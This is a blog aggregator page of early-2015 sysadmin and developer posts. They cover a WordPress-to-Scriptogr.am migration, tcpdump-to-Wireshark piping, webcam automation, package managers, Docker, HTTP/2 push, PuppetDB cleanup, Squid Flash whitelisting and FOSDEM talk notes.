Migrating from Wordpress to Scriptogr.am

I just migrated this blog from Wordpress to Scriptogr.am.

Mainly because this blog isn't so much active anymore, those SQL IOPS were useless for something that had become so static (I disabled the comments many years ago, tired of spam).

I missed Posterous and started looking for something similar, until I found about Calepin.co and Scriptogr.am.

For those of you who don't know, Scriptogr.am will fetch markdown text files from your Dropbox and turn them into a website.

What I like about this approach is that all my articles are stored locally (in a readable format) on my computer, and I can grep, sed and awk the hell out of them.

On the Mac, I use Mou and on Android Draft. I still have to find a good editor on Linux.

Draft can connect to your Dropbox and synchronise with any folder, so you can pick your posts folder. Most similar apps don't give you a choice.

Mou has many interesting features and has integrated with Scriptogram, so you can push your articles straight from the editor.

The downside of Scriptogr.am is probably the lack of comments (which I don't care about, and some people came up with the code to have Disqus anyway), the inability to search inside your blog (you have to Google it), and the fact that if you need several blogs on the platform, you have to have as many Dropbox accounts. I can deal with that, I have a personal and work Dropbox account, I both use them for this blog and my travel blog.

I used exitwp to convert the XML export of Wordpress into markdown.

Now, you might actually start seeing new content now all over again, given how easy it is to publish stuff :-)

February 17, 2015 05:00 AM

February 16, 2015

Sébastien Wains

Pipe tcpdump trafic into Wireshark from a remote server

This command will allow you to pipe trafic generated by tcpdump on a remote machine into Wireshark running on your local machine:

ssh root@dest tcpdump -U -s0 -w - 'tcp port 389' | wireshark -k -i -

February 16, 2015 05:00 AM

Bash: loop until a connection is successful

I use Terminator as my terminal app, and use the "watch for activity" feature a lot. With the following command, I'd get notified as soon as the connection is opened.

while ! nc -vz localhost 3306; do sleep 1; done
echo 'Database is available'

February 16, 2015 05:00 AM

Android Automagic: enable or disable motion detection on Dlink webcams

This has been tested on DCS-930L and DCS-5020L

<?xml version='1.0' encoding='UTF-8' standalone='yes' ?>
<data version="1.25.0">
  <trigger type="wifi_connected">
    <useDefaultName>true</useDefaultName>
    <name>WiFi Connected: SSID</name>
    <enabled>true</enabled>
    <all>false</all>
    <ssidList>SSID</ssidList>
  </trigger>
  <trigger type="wifi_disconnected">
    <useDefaultName>true</useDefaultName>
    <name>WiFi Disconnected: SSID</name>
    <enabled>true</enabled>
    <all>false</all>
    <ssidList>SSID</ssidList>
  </trigger>
  <condition type="active_network_type">
    <useDefaultName>true</useDefaultName>
    <name>Active Network Type: Mobile</name>
    <none>false</none>
    <mobile>true</mobile>
    <wifi>false</wifi>
    <wimax>false</wimax>
    <bluetooth>false</bluetooth>
    <ethernet>false</ethernet>
  </condition>
  <action type="http_request">
    <useDefaultName>true</useDefaultName>
    <name>HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save store in motion</name>
    <url>https://webcam.public.url/setSystemMotion</url>
    <verifyCertificates>true</verifyCertificates>
    <basicAuthentication>true</basicAuthentication>
    <username>admin</username>
    <httpMethod>POST</httpMethod>
    <httpContentType>X_WWW_FORM_URLENCODED</httpContentType>
    <contentType>text/plain</contentType>
    <generalTextData></generalTextData>
    <formFieldList>ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save</formFieldList>
    <timeout>60000</timeout>
    <storeInVariable>true</storeInVariable>
    <variable>motion</variable>
    <path>/storage/emulated/0/Download/file.bin</path>
  </action>
  <action type="http_request">
    <useDefaultName>true</useDefaultName>
    <name>HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save store in response</name>
    <url>https://webcam.public.url/setSystemMotion</url>
    <verifyCertificates>true</verifyCertificates>
    <basicAuthentication>true</basicAuthentication>
    <username>admin</username>
    <httpMethod>POST</httpMethod>
    <httpContentType>X_WWW_FORM_URLENCODED</httpContentType>
    <contentType>text/plain</contentType>
    <generalTextData></generalTextData>
    <formFieldList>ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save</formFieldList>
    <timeout>60000</timeout>
    <storeInVariable>true</storeInVariable>
    <variable>response</variable>
    <path>/storage/emulated/0/Download/file.bin</path>
  </action>
  <action type="notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Notification on Statusbar: Webcam disabled House ID 2</name>
    <notificationIcon>HOUSE</notificationIcon>
    <title>Webcam disabled</title>
    <message>Motion disabled</message>
    <sound>false</sound>
    <vibrate>false</vibrate>
    <flashLED>false</flashLED>
    <flashLEDColor>#ff00ff00</flashLEDColor>
    <flashLEDOn>500</flashLEDOn>
    <flashLEDOff>500</flashLEDOff>
    <flagLocalOnly>false</flagLocalOnly>
    <flagOngoing>false</flagOngoing>
    <flagNoClear>false</flagNoClear>
    <notificationIDEnabled>true</notificationIDEnabled>
    <notificationID>2</notificationID>
    <priority>DEFAULT</priority>
    <visibility>PRIVATE</visibility>
    <messageBigEnabled>false</messageBigEnabled>
    <messageBig></messageBig>
    <largeIconEnabled>false</largeIconEnabled>
    <largeIcon></largeIcon>
  </action>
  <action type="notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Notification on Statusbar: Webcam enabled House ID 3</name>
    <notificationIcon>HOUSE</notificationIcon>
    <title>Webcam enabled</title>
    <message>Motion enabled</message>
    <sound>false</sound>
    <vibrate>false</vibrate>
    <flashLED>false</flashLED>
    <flashLEDColor>#ff00ff00</flashLEDColor>
    <flashLEDOn>500</flashLEDOn>
    <flashLEDOff>500</flashLEDOff>
    <flagLocalOnly>false</flagLocalOnly>
    <flagOngoing>false</flagOngoing>
    <flagNoClear>false</flagNoClear>
    <notificationIDEnabled>true</notificationIDEnabled>
    <notificationID>3</notificationID>
    <priority>DEFAULT</priority>
    <visibility>PRIVATE</visibility>
    <messageBigEnabled>false</messageBigEnabled>
    <messageBig></messageBig>
    <largeIconEnabled>false</largeIconEnabled>
    <largeIcon></largeIcon>
  </action>
  <action type="remove_notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Remove Notification on Statusbar: 2 (Automagic)</name>
    <automagicNotifications>true</automagicNotifications>
    <all>false</all>
    <notificationID>2</notificationID>
    <overall>true</overall>
    <packageName></packageName>
    <allOfApp>true</allOfApp>
    <filterNotificationID></filterNotificationID>
  </action>
  <action type="remove_notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Remove Notification on Statusbar: 3 (Automagic)</name>
    <automagicNotifications>true</automagicNotifications>
    <all>false</all>
    <notificationID>3</notificationID>
    <overall>true</overall>
    <packageName></packageName>
    <allOfApp>true</allOfApp>
    <filterNotificationID></filterNotificationID>
  </action>
  <action type="sleep">
    <useDefaultName>true</useDefaultName>
    <name>Sleep: 15s (allow device sleep)</name>
    <duration>15s</duration>
    <keepDeviceAwake>false</keepDeviceAwake>
  </action>
  <flow type="flow">
    <name>Webcam disable motion</name>
    <group>Webcam</group>
    <enabled>true</enabled>
    <lastExecutionStartTime>1417460412281</lastExecutionStartTime>
    <lastExecutionEndTime>1417460413698</lastExecutionEndTime>
    <executionPolicy>PARALLEL</executionPolicy>
    <triggercontainer id="t1" x="-70.0" y="87.5">
      <trigger>WiFi Connected: SSID</trigger>
    </triggercontainer>
    <actioncontainer id="t2" x="-70.0" y="262.5">HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save store in motion</actioncontainer>
    <actioncontainer id="t3" x="280.0" y="787.5">Remove Notification on Statusbar: 3 (Automagic)</actioncontainer>
    <actioncontainer id="t4" x="35.0" y="577.5">Notification on Statusbar: Webcam disabled House ID 2</actioncontainer>
    <connection from="t1" to="t2" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t2" to="t4" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t4" to="t3" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
  </flow>
  <flow type="flow">
    <name>Webcam enable motion</name>
    <group>Webcam</group>
    <enabled>true</enabled>
    <lastExecutionStartTime>1417459379523</lastExecutionStartTime>
    <lastExecutionEndTime>1417459399056</lastExecutionEndTime>
    <executionPolicy>PARALLEL</executionPolicy>
    <triggercontainer id="t1" x="-175.0" y="17.5">
      <trigger>WiFi Disconnected: SSID</trigger>
    </triggercontainer>
    <actioncontainer id="t2" x="-175.0" y="227.5">Sleep: 15s (allow device sleep)</actioncontainer>
    <conditioncontainer id="t3" x="-175.0" y="472.5">Active Network Type: Mobile</conditioncontainer>
    <actioncontainer id="t4" x="-175.0" y="682.5">HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save store in response</actioncontainer>
    <actioncontainer id="t5" x="105.0" y="262.5">Notification on Statusbar: Webcam enabled House ID 3</actioncontainer>
    <actioncontainer id="t6" x="105.0" y="682.5">Remove Notification on Statusbar: 2 (Automagic)</actioncontainer>
    <connection from="t1" to="t2" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t2" to="t3" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t3" to="t4" type="TRUE" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t3" to="t2" type="FALSE" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t4" to="t5" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t5" to="t6" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
  </flow>
</data>

February 16, 2015 05:00 AM

February 14, 2015

Mattias Geniar

Three Tiers of Package Managers

The post Three Tiers of Package Managers appeared first on ma.ttias.be.

There are too many effing package managers. No, seriously -- there are. If you look at a typical Linux server with a modern webstack installed on it, there's easily 5 or more package managers available.

Who's responsible for which one? The way I see it, there are 3 typical tiers of package managers, with one problematic zone that we need to address.

The Ops Tier

Every sysadmin knows how to keep their system up-to-date. We have the Fedora family with the yum package manager, Debian derivatives via apt, Arch has pacman, ... every Linux family has their own major package manager. And every sysadmin knows about these, and how they're used to keep the system updated.

On Linux, the amount of package managers we as "ops" need to know about is pretty limited and straight forward.

The Dev Tier

Enter the wild west. Most programming languages have one or more package managers.

In the PHP world, one of the older -- but still used -- package managers is pear. Pear is used to install common PHP classes server-wide.

In addition, in recent years PHP has seen the adoption of the composer package manager. This is far more flexible than pear, as it allows package (typically: PHP classes and the occasional system binaries) to be installed locally, in a local path. composer also allows for packages to be installed system-wide (ie: drush), but most use is for local classes, specific to the project.

Composer uses upstream repositories (like cvs, git, tarballs, ...) to install packages, but a developer can also use plain git submodules for dependency management.

The Node community has npm, Puppet-folks have librarian, Ruby has bundler, ...

These tools are more obvious, they are the responsibility of the developer. If urgent updates are needed, the developer should check for compatibility and install/update the required package.

The Middle Ground (DevOps?)

Between the Ops and Dev package managers lies a more difficult grey area. It's the area that requires more communication between Dev + Ops and a lot more coordination.

For instance, the PHP world also has a package manager called pecl. Pecl is a package manager that downloads PHP extension source code and compiles it into the working PHP extension. The pecl package manager is often run with root privileges and the PHP extension is installed server-wide and included in the /etc/php.d/ .ini configurations.

But these kind of installations are mostly a one-time installation. Since pecl is one of those typical lesser used/third party package manager, extensions are often installed once and never updated.

The same goes for the Ruby world, with packages installed via gem or in Python's case via pip. Add to this the ability to run multiple versions of Ruby with rvm, each having their own gems, and it can quickly become a problem of responsibilities.

Who's task is it to keep the system-wide installed additional packages up-to-date? Updating a pecl/gem/pip package can have serious impact on the application.

Typically, those kind of packages are only updated when A) a developer reports a problem or B) a security vulnerability is reported and the update is required, regardless of application compatibility (which can be fixed in a later stage).

Clear separation of concerns

That grey area is problematic. Ops know their package managers, Dev know of their own. But those packages that have a direct impact on the application *and* require root-level installation privileges to install/update, will come back to hunt us one day.

Ruby's method of locally installing gems via rvm is a solid approach, but how often are those gems updated by developers? For PHP I think it's even more complex, as custom extensions need to be loaded in the php-fpm master process, typically started/stopped/managed by system administrators -- not developers. There's no easy way to inject custom PHP extensions as a developer, without Ops-interventions.

If anyone is looking for a new open source idea, I think package/repository management is an area that can use a lot of loving and has a lot of potential. The most difficult part is having all communities (Linux distributions + developer communities) to come together on this.

The post Three Tiers of Package Managers appeared first on ma.ttias.be.

by Mattias Geniar at February 14, 2015 10:12 AM

Wouter Verhelst

Docker

... is the new hype these days. Everyone seems to want to be part of it; even Microsoft wants to allow Docker to run on its platform. How they visualise that is slightly beyond me, seen as how Docker is mostly a case of "run a bunch of LXC instances", which by their definition can't happen on Windows. Presumably they'll just run a lot more VMs, then, which is a possible workaround. Or maybe Docker for Windows will be the same in concept, but not in implementation. I guess the future will tell.

As I understand the premise, the idea of Docker is that getting software to run on "all" distributions is a Hard Problem[TM], so in a Docker thing you just define that this particular stuff is meant to run on top of this and this and that environment, and Docker then compartmentalises everything for you. It should make things easier to maintain, and that's a good thing.

I'm not a fan. If the problem that Docker tries to fix is "making software run on all platforms is hard", then Docker's "solution" is "I give up, it's not possible". That's sad. Sure, having a platform which manages your virtualisation for you, without having to manually create virtual machines (or having to write software to do so) is great. And sure, compartmentalising software so that every application runs in its own space can help towards security, manageability, and a whole bunch of other advantages.

But having an environment which says "if you want to run this applicaiton, I'll set up a chroot with distribution X for you; if you want to run this other application, I'll set up a chroot with distribution Y for you; and if you want to run yet this other application yere, I'll start doing a chroot with distribution Z for you" will, in the end, get you a situation where, if there's another bug in libc6 or libssl, you now have a nightmare trying to track down all the different versions in all the docker instances to make sure they're all fixed. And while it may work perfectly well on the open Internet, if you're on a corporate network with a paranoid firewall and proxy, downloading packages from public mirrors is harder than just creating a local mirror instead. Which you now have to do not only for your local distribution of choice, but also for the distributions of choice of all the developers of the software you're trying to use. Which may result in more work than just trying to massage the software in question to actually bloody well work, dammit.

I'm sure Docker has a solution for some or all of the problems it introduces, and I'm not saying it doesn't work in practice. I'm sure it does fix some part of the "Making software run on all platforms is hard" problem, and so I might even end up using it at some point. But from an aesthetical point of view, I don't think Docker is a good system.

I'm not very fond of giving up.

February 14, 2015 09:58 AM

February 11, 2015

Frank Goossens

Motivational bull rebuffed

Just found this gem on the interwebz;

When “I” is replaced by “we”, even “illness” becomes “wellness”.

I’m not that into that group-motivational bull, so I had to refrain myself from replying;

And I’ll puke becomes we’ll puke. But somehow that’s less motivational, isn’t it? ;-)

by frank at February 11, 2015 08:18 AM

February 10, 2015

Philip Van Hoof

Huge respect for German chancellor Merkel

I, myself, actually would not be able to live with not having made this attempt – Angela Merkel

by admin at February 10, 2015 11:25 PM

February 09, 2015

Mattias Geniar

Service Side Push in HTTP/2 With nghttp2

The post Service Side Push in HTTP/2 With nghttp2 appeared first on ma.ttias.be.

At this pace of development, nghttp2 is a project to keep an eye on.

We implemented HTTP/2 server push in nghttpx and we enabled server push in nghttp2.org site. When you access https://nghttp2.org via HTTP/2 protocol, CSS file /stylesheets/screen.css is pushed to client.
nghttp2 blog

If you look at the page load of that blog in the browser, a few things stand out.

nghttp2_server_side_push

The response header contained the link: resource for sending additional content to the browser, without the client having to request for it (and thus needing to parse the DOM). This is finally showing server side push in HTTP/2 in the real world.

(note: to view the HTTP/2 protocol in the network tab, you should run Chrome Canary for the moment)

The result of this action is that the download of the stylesheet can happen much quicker. This is best shown with a comparison of a plain HTTP/1.1 site vs. the new HTTP/2 method with server side push.

Traditional HTTP/1.1 page load

For instance, here's the waterfall view of my own blog, running the classic HTTP/1.1 protocol.

plain_http_1_1_requests

The GET / request is made, and then stalls for a few milliseconds (~20ms) parsing the page before requesting the next resource, widget.css.

HTTP/2 Server Side Push page load

Compared to the HTTP/2 flow.

nghttp_server_side_push_benefit

The DOM and all additional resources don't need to be parsed, the client can already begin the download of the screen.css resource, without "wasting time" processing the DOM and all external resources, only to make a new request to the server to begin fetching them.

When you add this all up for all resources on a page, this can easily save 100-200ms of the total page load/paint of a website. Those are numbers that should really have you consider implementing HTTP/2.

In terms of responsiveness and web speed, HTTP/2 can make a serious difference -- especially with server side push.

The post Service Side Push in HTTP/2 With nghttp2 appeared first on ma.ttias.be.

by Mattias Geniar at February 09, 2015 09:53 PM

Kris Buytaert

2014 vs 2015 interest in Open Source Configuration Management

A couple of people asked me to results of the survey of the 2015 vs 2014 Configuration Management Camp room interrests.

This is a bunch of 350 last year and 420 people telling us what tools they are interested in so we can map the right roomsizes to the communities.

2014 :

2015:

Enjoy.. but remember there's Lies, Damn Lies and Statistics ..
PS. this is a mostly European Audience .

by Kris Buytaert at February 09, 2015 08:05 PM

Frank Goossens

Alt-J on Arte with La Blogotheque

If you hurry (the vid is up until tomorrow evening, February 10th), you can watch Alt-J perform live in “La chapelle des Petits Augustins des Beaux Arts” thanks to Arte & La Blogotheque.

by frank at February 09, 2015 05:53 PM

February 06, 2015

Dries Buytaert

Growing Drupal in Latin America

When I visited Brazil in 2011, I was so impressed by the Latin American Drupal community and how active and passionate the people are. The region is fun and beautiful, with some of the most amazing sites I have seen anywhere in the world. It also happens to be a strategic region for the project.

Latin American community members are doing their part to grow the project and the Drupal community. In 2014, the region hosted 19 Global Training Day events to recruit newcomers, and community leaders coordinated many Drupal camps to help convert those new Drupal users into skilled talent. Members of the Latin American community help promote Drupal at local technology and Open Source events, visiting events like FISL (7,000+ participants), Consegi (5,000+ participants) and Latinoware (4,500+ participants).

You can see the results of all the hard work in the growth of the Latin American Drupal business ecosystem. The region has a huge number of talented developers working at agencies large and small. When they aren't creating great Drupal websites like the one for the Rio 2016 Olympics, they are contributing code back to the project. For example, during our recent Global Sprint Weekend, communities in Bolivia, Colombia, Costa Rica, and Nicaragua participated and made valuable contributions.

The community has also been instrumental in translation efforts. On localize.drupal.org, the top translation is Spanish with 500 contributors, and a significant portion of those contributors come from the Latin America region. Community members are also investing time and energy translating Drupal educational videos, conducting camps in Spanish, and even publishing a Drupal magazine in Spanish. All of these efforts lower the barrier to entry for Spanish speakers, which is incredibly important because Spanish is one of the top spoken languages in the world. While the official language of the Drupal project is English, there can be a language divide for newcomers who primarily speak other languages.

Last but not least, I am excited that we are bringing DrupalCon to Latin America next week. This is the fruit of many hours spent by passionate volunteers in the Latin American local communities, working together with the Drupal Association to figure out how to make a DrupalCon happen in this part of the world. At every DrupalCon we have had so far, we have seen an increase in energy for the project and a bump in engagement. Come for the software, stay for the community! Hasta pronto!

by Dries at February 06, 2015 07:45 PM

Mattias Geniar

Clearing All Data From PuppetDB (exported resources)

The post Clearing All Data From PuppetDB (exported resources) appeared first on ma.ttias.be.

I had an annoying problem in my test environment when working Puppet's exported resources, which was caused by a unique constraint violation.

$ puppet agent -t
...
Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Failed to submit 'replace facts' command for $::fqdn to PuppetDB at $::puppetmaster:8081: [404 Not Found]
Problem accessing /v3/commands. Reason: Not Found
...
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run

On the PuppetDB logs, I could see signs of integrity violations in the database.

...
org.hsqldb.HsqlException: error in script file line: 9621 org.hsqldb.HsqlException: integrity constraint violation: unique constraint or index violation; SYS_PK_10029 table: RESOURCE_PARAMS
...

Since this was a test environment and I didn't really feel like debugging this all too much, I considered it easier to just remove all data from the PuppetDB built-in storage and start anew, thinking it was most likely caused by a user-error on my side.

To clear all data from your PuppetDB, take the following steps. It'll stop PuppetDB, remove the data-directory and restart PuppetDB so it can rebuild its data structures.

$ service puppetdb stop
$ cd /var/lib/puppetdb 
$ mv db db.old
$ service puppetdb start

After the new start, your PuppetDB logs will contain the following kind of entries.

INFO  [c.p.p.s.migrate] Applying database migration version 1
INFO  [c.p.p.s.migrate] Applying database migration version 2
INFO  [c.p.p.s.migrate] Applying database migration version 3
...
INFO  [c.p.p.c.services] Starting broker

In the end, your directory structures will be similar to these.

$ ls -alh /var/lib/puppetdb/
drwxr-xr-x   6 puppetdb puppetdb 4.0K Jan 29 09:01 .
drwxr-xr-x. 30 root     root     4.0K Jul  2  2014 ..
lrwxrwxrwx   1 puppetdb puppetdb   20 Jan 14 13:05 config -> /etc/puppetdb/conf.d
drwxr-xr-x   3 puppetdb puppetdb 4.0K Jan 29 09:03 db
drwxr-xr-x   3 puppetdb puppetdb 4.0K Jan 29 09:01 db.old
drwxr-xr-x   3 puppetdb puppetdb 4.0K Oct 21 20:38 mq
drwxr-xr-x   2 puppetdb puppetdb 4.0K Oct 21 20:38 state

The db.old can be removed if you no longer need it, or placed back into place to debug whichever problem you had in the first place.

The post Clearing All Data From PuppetDB (exported resources) appeared first on ma.ttias.be.

by Mattias Geniar at February 06, 2015 08:17 AM

Frank Goossens

What does a webtech addict do when in a Tesla?

Tesla Model S infotainment panelWell, checking out the browser, off course!

I had the opportunity to ride along with a friend in his brand new Tesla yesterday. Great ride, but you know that already, so I checked out the browser and data connectivity obviously. I visited my own little “ip check” page and saw this in the logfile:

188.207.103.140 – – [05/Feb/2015:12:17:24 +0100] “GET /check_ip.php HTTP/1.1″ 200 132 “-” “Mozilla/5.0 (X11; Linux) AppleWebKit/534.34 (KHTML, like Gecko) QtCarBrowser Safari/534.34″

Breaking it down:

I sure hope there are not too many vulnerabilities in those old version of of QT and WebKit, but one does not drive a Tesla to browse the internet, does one? ;-)

by frank at February 06, 2015 06:14 AM

February 05, 2015

Mattias Geniar

FCC: Net Neutrality in the United States

The post FCC: Net Neutrality in the United States appeared first on ma.ttias.be.

Now we (well, the US) is getting somewhere.

The internet must be fast, fair and open. That is the message I’ve heard from consumers and innovators across this nation. That is the principle that has enabled the internet to become an unprecedented platform for innovation and human expression.
Tom Wheeler, FCC chairman

Couldn't agree more.

I've ranted on net neutrality often enough already, so I won't repeat myself. I'm very happy to see the FCC take regulatory actions to ensure net neutrality on a higher level.

Using this authority, I am submitting to my colleagues the strongest open internet protections ever proposed by the FCC. These enforceable, bright-line rules will ban paid prioritization, and the blocking and throttling of lawful content and services. I propose to fully apply—for the first time ever—those bright-line rules to mobile broadband. My proposal assures the rights of internet users to go where they want, when they want, and the rights of innovators to introduce new products without asking anyone’s permission.

Tom Wheeler, FCC chairman

I'm curious to see Europe's response, if any.

The post FCC: Net Neutrality in the United States appeared first on ma.ttias.be.

by Mattias Geniar at February 05, 2015 02:33 PM

Check if Value is Present in Array in Puppet

The post Check if Value is Present in Array in Puppet appeared first on ma.ttias.be.

I somehow keep having to google this, and the first hits are bugreports or old posts (pre 2010) that require inlined Ruby code for Puppet 2.7. There's an easier way to check this.

To see if a variable value is present in an array, use the following.

if ! ($ensure in [ 'present', 'absent' ]) {
   ...
}

The above checks if the variable $ensure consists of either the value 'present' or 'absent'.

The post Check if Value is Present in Array in Puppet appeared first on ma.ttias.be.

by Mattias Geniar at February 05, 2015 01:46 PM

February 04, 2015

Xavier Mertens

Restricting Access to Flash Files with Squid

Flash TombstoneIs “swf” the new “wtf“? What’s happening with the Flash player? The Adobe’s multimedia platform has been targeted by multiple 0-days since the beginning of 2015! Just have a look on cvedetails.com. Two days ago, security researchers at TrendMicro found another one. It is identified as CVE-2015-0313.

Bored by the multiple patches released by Adobe and the impact on the deployment, many security people are brainstorming about a potential removal of the popular browser plugin from their computers (and their users’ computers). Is it a good idea? If more and more websites are offering alternative interfaces via HTML5 (like Youtube), there are again lot of websites which won’t work without Flash support. In my case, a good example is Deezer which uses .swf files for its players!

To protect ourselves, why not build a whitelist of trusted Flash files? Here is a quick setup via Squid, the open source proxy. Squid has very powerful features and amongst some of them, it offers a powerful ACL (“Access Control List“) system. Basic ACL’s can be used to filter domain names, IP addresses or ports but they are very interesting ACL types like:

Regular expressions can be used or flat files (1 element / line). Let’s define two new ACLs:

acl FlashBlacklist urlpath_regex -i \.swf
acl FlashWhitelist urlpath_regex "/etc/squid3/allowed-swf.txt"

The first one will match the string (non case sensitive) “.swf” in the URL path and the second one will match any regex from the file “/etc/squid3/allowed-swf.txt“. The file looks like this:

/embedded/small-widget-v2.swf
/swf/coreplayer3-v00341125.swf 
/swf/singlePlayer-v10.swf

This example matches the Flash files used by the Deezer player. The next step is to apply the ACL:

http_access allow FlashWhitelist
http_access deny FlashBlacklist

Take care to insert them at the right place within your existing ACLs! Here is the result in the Squid log file:

# grep swf /var/log/squid3/access.log
1423084706.664 0 192.168.254.200 TCP_DENIED/403 3889 GET http://taggalaxy.de/taggalaxy_beta.swf - NONE/- text/html
1423084748.191 0 192.168.254.200 TCP_DENIED/403 3969 GET http://s0.2mdn.net/3070333/beco111_Day_Trip_Promo_Fr_300x250.swf - NONE/- text/html
1423084775.988 8 192.168.254.200 TCP_HIT/200 58684 GET http://cdn-files.deezer.com/swf/coreplayer3-v00341125.swf - NONE/- application/x-shockwave-flash

Note that Squid can also block traffic based on the MIME type of objects but the detected type is not always correct (see the 2nd line). Now, it’s up to you to catch the denied access with your preferred log management tool.

Working with whitelist is not the most efficient way to allow access to trusted files but it is the most secure. By default, any .swf file will be blocked. Last remark, this is just a quick countermeasure: it must not prevent you to patch your systems!

by Xavier at February 04, 2015 10:00 PM

Mattias Geniar

Game of Chromes

The post Game of Chromes appeared first on ma.ttias.be.

I saw this a few days ago on Twitter, but never paid much attention to it. Until my internet went down, and it popped up. In my browser.

If you're offline and open Chrome, it's a 2D platform game!

the_game_of_chrome

Not that this has any value inside of a browser, but still --- it's pretty cool!

The post Game of Chromes appeared first on ma.ttias.be.

by Mattias Geniar at February 04, 2015 07:18 PM

February 02, 2015

Mattias Geniar

Deep Insights: The Kernel Boot Process

The post Deep Insights: The Kernel Boot Process appeared first on ma.ttias.be.

You've got to love collaboration. Especially on documentation. The github repo 0xAX/linux-insides has a fantastic set of resources that describe the Linux boot process in great detail.

The entire collaborative project is available on Github.

It features:

  1. Step 1: From the bootloader to the kernel
  2. Step 2: First steps in the kernel setup
  3. Step 3: Video mode initialization and transition to protected mode

I suggest you take your time for these, as they're quite lengthy and go into great detail.

This project reminded me of another successful collaboration: What happens when you type google.com into your browser's address box and press enter?. That project goes into great depths on all the technical details of web browsing over HTTP/1.1 and the web in general.

The post Deep Insights: The Kernel Boot Process appeared first on ma.ttias.be.

by Mattias Geniar at February 02, 2015 09:41 PM

Fosdem 2015 Notes

The post Fosdem 2015 Notes appeared first on ma.ttias.be.

Last weekend was Fosdem 2015. For some of the talks I attended, I took some detailed notes. Here are links to each of those.

I hope the notes can be of value to someone!

The post Fosdem 2015 Notes appeared first on ma.ttias.be.

by Mattias Geniar at February 02, 2015 09:22 PM

Claudio Ramirez

Perl@Fosdem: thanks!

fosdemSo far, the reactions to the Perl presence at Fosdem  have been great. The dev-room was more than packed most of the day, the Perl booth was by far the nicest there (biggest Perl library in the world, huge and small camels, wall sized banners, books, stickers, wine from the city of Perl (!), …) and Larry’s big announcement in a packed 1400 sits auditorium made waves: Christmas got a date.

So a big thank you for everyone helping out: the speakers, the dev-room (Theo, Geoff!) and booth volunteers and of course the audience!

According to the Fosdem people, the videos should be online Real Soon ™…


Filed under: Uncategorized Tagged: devroom, fosdem, fosdem 2015, Perl

by claudio at February 02, 2015 02:54 PM

February 01, 2015

Mattias Geniar

Ntimed: an NTPD replacement

The post Ntimed: an NTPD replacement appeared first on ma.ttias.be.

Poul-Henning Kamp presented this talk at FOSDEM, titled "Ntimed an NTPD replacement".

There was no intro for the talk. None whatsoever. Just the title. And as expected, a completely full room. The man is famous.

Here are some of my notes.

phk_ntimed_fosdem_1

phk_ntimed_fosdem_2

As usual with PHK, one of the main focusses is security.

phk_ntimed_fosdem_3

phk_ntimed_fosdem_4

phk_ntimed_fosdem_5

phk_ntimed_fosdem_6

Despite my rants on this topic, Ntimed looks promising. It's not done yet, but it's something to keep an eye on, before the ticking time bomb of NTPD bites us all.

The post Ntimed: an NTPD replacement appeared first on ma.ttias.be.

by Mattias Geniar at February 01, 2015 03:18 PM

What’s New in systemd, 2015 Edition

The post What’s New in systemd, 2015 Edition appeared first on ma.ttias.be.

This post is part of a series of notes I've taken at FOSDEM 2015 in Brussels, Belgium. If you're interested, have a look at the other posts.

A packed room at Fosdem for Lennart Poettering's talk on systemd, the 2015 edition.

systemd is now a core component of most major distributions. In this talk I want to give an overview over everything new in the systemd project over the last year, and what to expect over the next year.

fosdem talk description

There were no slides. None whatsoever. No presentation. He just talked.

lennart_systemd_fosdem_2015

Notes are scribbled down really quickly, so errors may occur. Don't quote this directly. If you spot any errors, please let me know. ;-)

Transcript

fosdem_2015_systemd_room

Part deux

Update

Updated for correctness:

State retention

systemd will add support for restarting services without losing state. Every daemon will store a minimal system state on disk, so if it's restarted it can resume the original state. This will allow daemons to restart themselves without harm. Lately, journald has received support for this as well.

This concept builds further upon the socket activation. When restarting a service, systemd can push the used sockets/file descriptors of that service to the sytemd daemon and pass it again to the service once it restarted. This way, no sockets/fd's are lost.

Key takeways: most of what is in systemd is optional (except for journald). If there are parts you don't like or disagree with, you can just not use it. Documentation is being worked on and is considered a priority in the systemd project.

If you're interested, I have another post on resources for learning systemd you may find interesting. It also has some interesting comments.

Update 3/2/2015: I've removed some truly offending comments. I do not approve of hate and threat on this blog. You are free to discuss the pro's/cons of systemd -- but any form of threat against anyone's life will be deleted straight away, no matter if it's meant as a "joke".

The post What’s New in systemd, 2015 Edition appeared first on ma.ttias.be.

by Mattias Geniar at February 01, 2015 12:04 PM

Live Migrations for Containers with CRIU

